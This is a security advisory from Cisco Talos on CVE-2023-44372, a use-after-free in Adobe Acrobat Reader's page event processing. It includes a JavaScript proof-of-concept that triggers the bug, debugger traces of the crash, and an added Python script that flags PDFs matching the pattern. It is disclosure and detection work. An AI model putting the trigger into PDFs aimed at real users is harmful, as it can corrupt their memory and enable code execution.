Talos Vulnerability Report

TALOS-2023-1842

Adobe Acrobat Reader U3D page event use-after-free vulnerability

November 15, 2023
CVE Number

CVE-2023-44372

SUMMARY

A use-after-free vulnerability exists in the page event processing of Adobe Acrobat Reader 2023.006.20320. Specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Adobe Acrobat Reader 2023.006.20320

PRODUCT URLS

Acrobat Reader - https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs.

Adobe's PDF JavaScript environment always has an event object associated with the current execution. Different types of event objects are available inside different event handlers, such as a field event object or a page open event object. A use-after-free vulnerability exists in the way Adobe Acrobat handles the lifetime of these objects, specifically for pages containing U3D objects. The following excerpt from the PoC demonstrates this vulnerability:

function main() {
    // Switch to page index 4 and add a text field named "poc" on that page
    this.pageNum = 4;
    app.activeDocs[0].addField("poc", "text", 4, [16,15,10,5]);
    // Install set_page as the Format action of the "poc" text field
    getField("poc").setAction("Format", 'set_page();');
}

function set_page() {
    // Changing the current page triggers a page event, which frees an object tied to "poc"
    this.pageNum = 0;
}

In the above excerpt, the addField method adds a text field named poc. Next, the callback function set_page is assigned to the Format action of the poc text field. When set_page is called, it changes the current page, which triggers a page event. This frees an object related to the poc text field. The use-after-free occurs when the freed object is subsequently used without any validation. We can observe the following in the debugger (with PageHeap enabled):

0:000> g
Breakpoint 4 hit
eax=00000001 ebx=4dcd4e78 ecx=f147eeb8 edx=00000000 esi=4dcd4e48 edi=00000000
eip=70f8f57f esp=0506ed0c ebp=0506ed34 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x5470ff:
70f8f57f 8955fc          mov     dword ptr [ebp-4],edx ss:002b:0506ed30=ffffffff 
0:000> dd esi                                                                                ;<---------------- [1]
4dcd4e48  71b3cf18 00000000 00000000 ffffffff
4dcd4e58  00000000 00000000 00000000 000003d5
4dcd4e68  00000132 000004ba 00000001 00010001
4dcd4e78  00000001 00000000 00000000 00000004
4dcd4e88  f147eeb8 59fc4ff8 00000143 00000000
4dcd4e98  719da464 5f744fe8 00000000 00000000
4dcd4ea8  00000000 00000000 00000000 00000000
4dcd4eb8  00000000 00000000 00000000 00000000
0:000> u
AcroRd32!AIDE::PixelPartInfo::operator=+0x5470ff:
70f8f57f 8955fc          mov     dword ptr [ebp-4],edx
70f8f582 e8f3c5e6ff      call    AcroRd32!AIDE::PixelPartInfo::operator=+0x3b36fa (70dfbb7a)  ;<---------------- [2]
70f8f587 8b4e40          mov     ecx,dword ptr [esi+40h]
70f8f58a 8bf8            mov     edi,eax
70f8f58c 56              push    esi
70f8f58d 689002f970      push    offset AcroRd32!AIDE::PixelPartInfo::operator=+0x547e10 (70f90290)
70f8f592 6a02            push    2
70f8f594 897e34          mov     dword ptr [esi+34h],edi

0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=000000e2 ebx=bac78000 ecx=bac8e55d edx=00000005 esi=0506e068 edi=bada9070
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000213
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000      cmp     eax,0E4h                                                     ;<---------------- [3]
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=000000e4 ebx=bac78000 ecx=bac8e562 edx=00000005 esi=0506e068 edi=bada9078
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000213
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000      cmp     eax,0E4h
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=0000003e ebx=bac78000 ecx=bc87d869 edx=00000001 esi=0506e068 edi=00000000
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0         nv up ei pl nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000217
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000      cmp     eax,0E4h
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=00000036 ebx=bac78000 ecx=bc87d86a edx=00000001 esi=0506e068 edi=00000000
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000213
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000      cmp     eax,0E4h
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=0506def4 ebx=0506e034 ecx=baf3a4c0 edx=ffffff85 esi=bac78000 edi=bac78000
eip=ba54af6c esp=0506de7c ebp=0506ded4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
EScript!PlugInMain+0xbafc:
ba54af6c 837dc881        cmp     dword ptr [ebp-38h],0FFFFFF81h ss:002b:0506de9c=ffffff85
0:000> pc
eax=0506e034 ebx=0506e034 ecx=baf3a4c0 edx=ffffff85 esi=bac78000 edi=bac78000
eip=ba54af84 esp=0506de78 ebp=0506ded4 iopl=0         nv up ei ng nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000292
EScript!PlugInMain+0xbb14:
ba54af84 e8210aeeff      call    EScript!mozilla::HashBytes+0x3093a (ba42b9aa)
0:000> pc
eax=d863efb8 ebx=00000000 ecx=58e59038 edx=ffffff85 esi=bac78000 edi=d863efb8
eip=ba54afaa esp=0506de70 ebp=0506ded4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
EScript!PlugInMain+0xbb3a:
ba54afaa e8f067eeff      call    EScript!mozilla::HashBytes+0x3672f (ba43179f)
0:000> p
eax=baf3a4c0 ebx=00000000 ecx=00000000 edx=ffffff85 esi=bac78000 edi=d863efb8
eip=ba54afaf esp=0506de70 ebp=0506ded4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
EScript!PlugInMain+0xbb3f:
ba54afaf 50              push    eax
0:000> dd eax
baf3a4c0  00000078 baf3a4c8 00610070 00650067
baf3a4d0  0075004e 0000006d 00000000 00000000
baf3a4e0  00000048 baf3a4e8 006f007a 006d006f
baf3a4f0  00000000 00000000 00000000 00000000
0:000> du baf3a4c8                                                                            ;<---------------- [4]
baf3a4c8  "pageNum"


0:000> g
eax=00000001 ebx=f0260f60 ecx=388dd4af edx=089f10d0 esi=4dcd4e48 edi=4dcd4e48
eip=70f4061e esp=0506dc30 ebp=0506dc44 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f819e:             
70f4061e 56              push    esi                                                          ;<---------------- [5]
0:000> dd 4dcd4e48                                                                            ;<---------------- [6]
4dcd4e48  7186a5e0 00000000 00000000 ffffffff
4dcd4e58  00000000 00000000 00000000 000003d5
4dcd4e68  00000132 000004ba 00000001 00000001
4dcd4e78  00000001 00000000 00000000 00000004
4dcd4e88  f147eeb8 59fc4ff8 00000143 00000000
4dcd4e98  7186a5e0 5f744fe8 00000000 00000000
4dcd4ea8  00000000 00000000 00000000 00000000
4dcd4eb8  00000000 00000000 00000000 00000000
0:000> p
eax=00000001 ebx=f0260f60 ecx=388dd4af edx=089f10d0 esi=4dcd4e48 edi=4dcd4e48
eip=70f4061f esp=0506dc2c ebp=0506dc44 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f819f:
70f4061f e89c6b1fff      call    AcroRd32!AcroWinMainSandbox+0x81b0 (701371c0)                   ;<---------------- [7]
0:000> p
eax=00000001 ebx=f0260f60 ecx=4dcd4e48 edx=089f10e0 esi=4dcd4e48 edi=4dcd4e48
eip=70f40624 esp=0506dc2c ebp=0506dc44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f81a4:
70f40624 eb0c            jmp     AcroRd32!AIDE::PixelPartInfo::operator=+0x4f81b2 (70f40632)
0:000> dd 4dcd4e48                                                                               ;<---------------- [8]
4dcd4e48  ???????? ???????? ???????? ????????
4dcd4e58  ???????? ???????? ???????? ????????
4dcd4e68  ???????? ???????? ???????? ????????
4dcd4e78  ???????? ???????? ???????? ????????
4dcd4e88  ???????? ???????? ???????? ????????
4dcd4e98  ???????? ???????? ???????? ????????
4dcd4ea8  ???????? ???????? ???????? ????????
4dcd4eb8  ???????? ???????? ???????? ????????
0:000> p
eax=00000001 ebx=f0260f60 ecx=4dcd4e48 edx=089f10e0 esi=4dcd4e48 edi=4dcd4e48
eip=70f40632 esp=0506dc2c ebp=0506dc44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f81b2:
70f40632 59              pop     ecx

At [1] above, the esi register contains the vulnerable buffer. The method called at [2] eventually calls the interpreter to execute the bytecodes of the set_page function at [3] and [4]. The execution of those bytecodes triggers a page event, which eventually calls the free function at [7]. The argument of the free function comes from the esi register at [5]. The contents of the vulnerable buffer are shown at [6] and [8], before and after the free function is called, respectively. The freed buffer is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> g

Breakpoint 6 hit
eax=58c88f90 ebx=4dcd4e78 ecx=70dfbca4 edx=089f1078 esi=4dcd4e48 edi=00000000
eip=70dfbca4 esp=0506ed08 ebp=0506ed34 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x3b3824:
70dfbca4 c20400          ret     4

0:000> p
eax=58c88f90 ebx=4dcd4e78 ecx=70dfbca4 edx=089f1078 esi=4dcd4e48 edi=00000000
eip=70f8f587 esp=0506ed10 ebp=0506ed34 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x547107:
70f8f587 8b4e40          mov     ecx,dword ptr [esi+40h] ds:002b:4dcd4e88=????????   ;<---------------- [9]
0:000> u
AcroRd32!AIDE::PixelPartInfo::operator=+0x547107:
70f8f587 8b4e40          mov     ecx,dword ptr [esi+40h]
70f8f58a 8bf8            mov     edi,eax
70f8f58c 56              push    esi
70f8f58d 689002f970      push    offset AcroRd32!AIDE::PixelPartInfo::operator=+0x547e10 (70f90290)
70f8f592 6a02            push    2
70f8f594 897e34          mov     dword ptr [esi+34h],edi
70f8f597 e8b6705aff      call    AcroRd32!CTJPEGMetaData::operator=+0x14a8a2 (70536652)
70f8f59c 8b4e40          mov     ecx,dword ptr [esi+40h]
0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0506ed34 70f43b5c     388de517 dbaecab8 4dcd4e48 AcroRd32!AIDE::PixelPartInfo::operator=+0x547107
01 0506ed90 70f45094     00000001 70f3835d 388de6ab AcroRd32!AIDE::PixelPartInfo::operator=+0x4fb6dc
02 0506ee2c 70f3b254     00000001 00000000 00000001 AcroRd32!AIDE::PixelPartInfo::operator=+0x4fcc14
03 0506ee74 70f3fb7c     576ece40 00000001 00000000 AcroRd32!AIDE::PixelPartInfo::operator=+0x4f2dd4
04 0506eeb0 701b349b     576ece40 388de78f 24e10f50 AcroRd32!AIDE::PixelPartInfo::operator=+0x4f76fc
05 0506ef08 701b18b5     0005a45e 388de727 15fa8fd0 AcroRd32!DllCanUnloadNow+0x4c08b
06 0506efa0 701b15ba     0005a45e 701b12b7 388de77f AcroRd32!DllCanUnloadNow+0x4a4a5
07 0506eff8 70139ec4     000004d3 00000000 701399c0 AcroRd32!DllCanUnloadNow+0x4a1aa
08 0506f014 76b58e71     00050288 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xaeb4
09 0506f040 76b590d1     701399c0 00050288 00000113 USER32!_InternalCallWinProc+0x2b
0a 0506f0d4 76b5a66f     701399c0 00000000 00000113 USER32!UserCallWinProcCheckWow+0x18e
0b 0506f140 76b5a6e0     3919e0cf 0506f164 701b0b97 USER32!DispatchMessageWorker+0x208
0c 0506f14c 701b0b97     0506f180 17901da8 17901da8 USER32!DispatchMessageW+0x10
0d 0506f164 701b079e     0506f180 388df95f 17901da8 AcroRd32!DllCanUnloadNow+0x49787
0e 0506f1d8 701b04e0     388dfa97 17901da8 00000000 AcroRd32!DllCanUnloadNow+0x4938e
0f 0506f210 7012f783     388dfa03 1137cff8 00000000 AcroRd32!DllCanUnloadNow+0x490d0
10 0506f284 7012f19f     6ffa0000 00b30000 1137cff8 AcroRd32!AcroWinMainSandbox+0x773
11 0506f6a8 00d151a0     6ffa0000 00b30000 1137cff8 AcroRd32!AcroWinMainSandbox+0x18f
12 0506fa5c 00d616ba     00b30000 00000000 08a004e8 AcroRd32_exe!IsSandboxedProcess+0x125800
13 0506faa8 77107c04     fedbe000 77107be0 3dbd786d AcroRd32_exe!AcroRd32IsBrokerProcess+0x1d53a
14 0506fabc 7782b90f     fedbe000 3d2f5cfc 00000000 KERNEL32!BaseThreadInitThunk+0x24
15 0506fb04 7782b8da     ffffffff 778106e8 00000000 ntdll!__RtlUserThreadStart+0x2f
16 0506fb14 00000000     00d10e10 fedbe000 00000000 ntdll!_RtlUserThreadStart+0x1b

In the above debugger output, the crash occurs when esi is dereferenced, as if it were an object pointer. Depending on the memory layout of the process, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
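As an added triage example (not part of the Talos advisory or its PoC), the following Python script scans an uncompressed PDF for the three ingredients the excerpt above combines: a U3D stream, document JavaScript that installs a field action via setAction, and an assignment to pageNum that would fire a page event. The PDF fragment is constructed for the example and the helper names are the example's own; it assumes object streams have already been inflated (for instance with qpdf --qdf).

```python
import re

# Constructed sample (not a real exploit): an uncompressed PDF fragment with a
# U3D stream and a /JS literal string carrying the advisory's PoC pattern.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Page /Annots [3 0 R] >> endobj
2 0 obj << /Type /3D /Subtype /U3D /Length 0 >> stream
endstream endobj
4 0 obj << /S /JavaScript /JS (function main\\(\\) { this.pageNum = 4;
app.activeDocs[0].addField\\("poc", "text", 4, [16,15,10,5]\\);
getField\\("poc"\\).setAction\\("Format", 'set_page\\(\\);'\\); }
function set_page\\(\\) { this.pageNum = 0; }) >> endobj
"""

def extract_js_literals(data: bytes) -> list:
    """Decode every '/JS (...)' literal string, honouring backslash escapes and
    nested balanced parentheses per the PDF string syntax. Indirect '/JS n 0 R'
    streams are out of scope (assumed: file inflated first, e.g. qpdf --qdf)."""
    out = []
    for m in re.finditer(rb"/JS\s*\(", data):
        depth, j, buf = 1, m.end(), bytearray()
        while j < len(data) and depth:
            c = data[j:j + 1]
            if c == b"\\":            # escape: keep the next byte literally
                j += 1
                c = data[j:j + 1]
            elif c == b"(":
                depth += 1
            elif c == b")":
                depth -= 1
            if depth:                  # the final ')' closes the string
                buf += c
            j += 1
        out.append(buf.decode("latin-1"))
    return out

PAGE_CHANGE = re.compile(r"\bpageNum\s*=")      # page switch -> page event
FIELD_ACTION = re.compile(r"\.setAction\s*\(")  # field action installed by script

def triage(data: bytes) -> dict:
    """Flag the three ingredients the advisory's PoC combines."""
    js = "\n".join(extract_js_literals(data))
    return {"has_u3d": b"/U3D" in data,
            "field_action_script": bool(FIELD_ACTION.search(js)),
            "page_change_in_script": bool(PAGE_CHANGE.search(js))}

def matches_advisory_pattern(data: bytes) -> bool:
    """All three present: a hint worth a sandbox run, not proof of exploitation."""
    return all(triage(data).values())
```

Each flag on its own is common in benign documents; only the combination is worth escalating, and a legitimate 3D-annotated form with scripted navigation will still produce a false positive.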

TIMELINE

2023-10-09 - Vendor Disclosure
2023-11-14 - Vendor Patch Release
2023-11-15 - Public Release

Credit

Discovered by Kamlapati Choubey of Cisco Talos.